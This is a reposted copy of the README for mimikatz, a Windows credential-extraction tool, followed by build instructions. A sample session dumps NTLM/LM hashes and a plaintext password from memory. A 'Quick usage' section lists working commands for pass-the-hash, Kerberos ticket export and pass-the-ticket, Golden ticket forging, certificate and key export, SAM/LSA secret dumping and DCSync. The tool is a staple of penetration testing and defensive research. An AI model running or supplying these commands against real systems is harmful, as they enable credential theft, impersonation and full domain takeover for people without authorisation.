[关闭]
@zzzc18 2017-08-03T12:12:08.000000Z 字数 3825 阅读 930

mimikatz

else

mimikatz is a tool I've made to learn C and make somes experiments with Windows security.

It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

  1. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
  2. .## ^ ##.
  3. ## / \ ## /* * *
  4. ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  5. '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
  6. '#####' with 13 modules * * */
  7. mimikatz # privilege::debug
  8. Privilege '20' OK
  9. mimikatz # sekurlsa::logonpasswords
  10. Authentication Id : 0 ; 515764 (00000000:0007deb4)
  11. Session : Interactive from 2
  12. User Name : Gentil Kiwi
  13. Domain : vm-w7-ult-x
  14. SID : S-1-5-21-1982681256-1210654043-1600862990-1000
  15. msv :
  16. [00000003] Primary
  17. * Username : Gentil Kiwi
  18. * Domain : vm-w7-ult-x
  19. * LM : d0e9aee149655a6075e4540af1f22d3b
  20. * NTLM : cc36cf7a8514893efccd332446158b1a
  21. * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
  22. tspkg :
  23. * Username : Gentil Kiwi
  24. * Domain : vm-w7-ult-x
  25. * Password : waza1234/
  26. ...

But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).

If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases

Quick usage

  1. log
  2. privilege::debug

sekurlsa

  1. sekurlsa::logonpasswords
  2. sekurlsa::tickets /export
  3. sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

  1. kerberos::list /export
  2. kerberos::ptt c:\chocolate.kirbi
  3. kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

  1. crypto::capi
  2. crypto::cng
  3. crypto::certificates /export
  4. crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
  5. crypto::keys /export
  6. crypto::keys /machine /export

vault & lsadump

  1. vault::cred
  2. vault::list
  3. token::elevate
  4. vault::cred
  5. vault::list
  6. lsadump::sam
  7. lsadump::secrets
  8. lsadump::cache
  9. token::revert
  10. lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
* for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
* for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - ">http://www.microsoft.com/download/details.aspx?id=11800_

mimikatz uses SVN for source control, but is now available with GIT too!
You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)

Synchronize!

Build the solution

  • After opening the solution, Build / Build Solution (you can change architecture)
  • mimikatz is now built and ready to be used! (Win32 / x64)
    • you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

ddk2003

With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:
* http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licence

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

Author

This is a personal development, please respect its philosophy and don't use it for bad things!

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注